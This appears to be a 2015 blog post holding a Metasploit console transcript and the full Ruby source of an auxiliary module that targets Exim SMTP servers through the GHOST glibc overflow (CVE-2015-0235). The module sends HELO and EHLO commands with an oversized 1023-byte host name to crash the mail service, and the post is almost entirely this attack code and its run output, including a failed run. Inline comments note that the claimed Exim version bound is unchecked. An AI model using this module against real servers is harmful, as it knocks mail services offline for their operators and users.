Thursday, January 29, 2015

Exim ESMTP glibc gethostbyname() Buffer Overflow CVE-2015-0235



msf auxiliary(ghost-exim-smtp-dos) > run

[*] 192.168.1.132:25 - Server: ESMTP Exim 4.20
[*] 192.168.1.132:25 - HELO: ESMTP Exim 4.20
[-] Auxiliary failed: EOFError EOFError
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/rex/io/stream.rb:203:in `get_once'
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/smtp.rb:68:in `raw_send_recv'
[-]   /usr/share/metasploit-framework/modules/exploits/linux/smtp/ghost-exim-smtp-dos.rb:44:in `run'
[*] Auxiliary module execution completed
msf auxiliary(ghost-exim-smtp-dos) >


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


# Metasploit auxiliary module that connects to an SMTP server, sends a HELO and
# an EHLO with an oversized host-name argument, and prints whatever the server
# replies. The SMTP client helpers used below (connect, banner, raw_send_recv,
# disconnect) come from the Msf::Exploit::Remote::Smtp mixin; the DoS mixin
# supplies the auxiliary-module plumbing.
class Metasploit3 < Msf::Auxiliary

    include Msf::Exploit::Remote::Smtp
    include Msf::Auxiliary::Dos

    # Registers the module's metadata with the framework.
    def initialize
        super(
            'Name'           => 'Exim ESMTP glibc gethostbyname() Buffer Overflow CVE-2015-0235',
            # NOTE(review): the module title names a glibc bug (CVE-2015-0235);
            # the Exim version bound stated in this description is the author's
            # claim and is not checked anywhere in the code -- confirm it against
            # the advisory.
            'Description'    => %q{
                                This module exploits a buffer overflow in Exim SMTP servers version 4.20 or less resulting in a service crash on vulnerable systems.
                        },
            'Author'         => [ '1N3' ],
            'License'        => MSF_LICENSE,
            # Legacy SVN-style revision marker; presumably ignored by current
            # framework versions.
            'Version'        => '$Revision: 1 $'
        )
    end

    # Connects to RHOST:RPORT, prints the banner, aborts unless the banner
    # contains "Exim " (the check is skipped when datastore['SkipVersionCheck']
    # is truthy), then sends a HELO and an EHLO whose argument is a 1023-byte
    # string and prints each response line with a HELO:/EHLO: prefix.
    #
    # Error handling: fail_with(Failure::NoTarget) covers the non-Exim case.
    # Anything raised by raw_send_recv propagates unchanged; the transcript above
    # shows that when the peer closes the connection before replying, an
    # EOFError escapes from here and the framework reports a stack trace rather
    # than a clean "connection closed" status.
    def run()
    connect
    # self.banner is provided by the SMTP mixin; presumably captured by connect.
    print_status("#{rhost}:#{rport} - Server: #{self.banner.to_s.strip}")

    # Banner sanity check. SkipVersionCheck is not registered as an option in
    # this file; presumably it comes from the mixin -- verify if it is relied on.
    if not datastore['SkipVersionCheck'] and self.banner.to_s !~ /Exim /
      disconnect
      fail_with(Failure::NoTarget, "#{rhost}:#{rport} - The target server is not running Exim!")
    end

    # 1023-byte host-name argument reused for both HELO and EHLO.
    buffer = "0" * 1023
    helo_resp = raw_send_recv("HELO " + buffer + "\r\n")
    helo_resp.each_line do |line|
        print_status("#{rhost}:#{rport} - HELO: #{line.strip}")
    end

    ehlo_resp = raw_send_recv("EHLO " + buffer + "\r\n")
    ehlo_resp.each_line do |line|
        print_status("#{rhost}:#{rport} - EHLO: #{line.strip}")
    end

    # Reached only if both commands received a reply; this message therefore
    # says nothing about the server's state afterwards.
    print_status("Exploit sent!")
    disconnect()
    end
end
